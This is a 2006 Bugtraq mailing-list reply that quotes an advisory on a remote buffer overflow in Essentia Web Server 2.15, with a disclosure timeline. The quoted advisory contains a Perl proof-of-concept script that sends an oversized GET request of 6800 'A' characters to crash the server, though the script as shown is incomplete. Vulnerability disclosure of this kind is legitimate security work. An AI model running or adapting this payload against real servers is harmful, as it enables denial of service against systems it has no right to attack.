lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <200611121851.13555.noamr@beyondsecurity.com>
Date: Sun, 12 Nov 2006 18:51:13 +0200
From: Noam Rathaus <noamr@...ondsecurity.com>
To: bugtraq@...urityfocus.com
Subject: Re: [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow

Hi,

Very old news, http://www.securiteam.com/windowsntfocus/5QP0R156AC.html, 
apparently it was never patched by the vendor.

On Friday 10 November 2006 18:57, corrado.liotta@...ce.it wrote:
> -=[--------------------ADVISORY-------------------]=-
>
>               Essentia Web Server  V 2.15
>
>             Author:CorryL      x0n3-h4ck.org
> -=[-----------------------------------------------]=-
>
>
> -=[+] Application:    Essentia Web Server
> -=[+] Version:        2.15
> -=[+] Vendor's URL:   http://www.essencomp.com
> -=[+] Platform:       Windows
> -=[+] Bug type:       Buffer overflow
> -=[+] Exploitation:   Remote
> -=[-]
> -=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
> -=[+] Reference:      www.x0n3-h4ck.org
> -=[+] Virtual Office: http://www.kasamba.com/CorryL
>
> ..::[ Descriprion ]::..
>
> Providing enhanced Web Application and Communication Services, this is a
> high performance scalable web server that supports thousands of virtual
> servers.
>
> ..::[ Bug ]::..
>
> This software is affection from a buffer overflow
> what it would allow an attacker to perform arbitrary code
> on the system victim.
> Sending a GET+Ax6800 request, he would succeed
> to write above the seh point.
>
> ..::[ Proof Of Concept ]::..
>
> #!/usr/bin/perl
>
>
> use IO::Socket;
>
> use Getopt::Std; getopts('h:', \%args);
>
>
>
> if (defined($args{'h'})) { $host = $args{'h'}; }
>
> print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";
>
> print STDERR "-=[ Discovered By CorryL          corryl80@...il.com ]=-\n";
>
> print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";
>
> if (!defined($host)) {
>
> Usage();
>
> }
>
> $dos = "A"x6800;
>
> print "[+] Connect to $host\n";
>
> $socket = new IO::Socket::INET (PeerAddr => "$host",
>
>                                PeerPort => 80,
>
>                                Proto => 'tcp');
>
>                                die unless $socket;
>
> print "[+] Sending DOS byte\n";
>
>          $data = "GET /$dos \r\n\r\n";
>
>
> ..::[ Workaround ]::..
>
> nothing
>
> ..::[ Disclousure Timeline ]::..
>
> [30/10/2006] - Vendor notification
> [04/11/2006] – No Vendor Response
> [04/11/2006] - Public disclousure

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr@...ondsecurity.com
  http://www.beyondsecurity.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ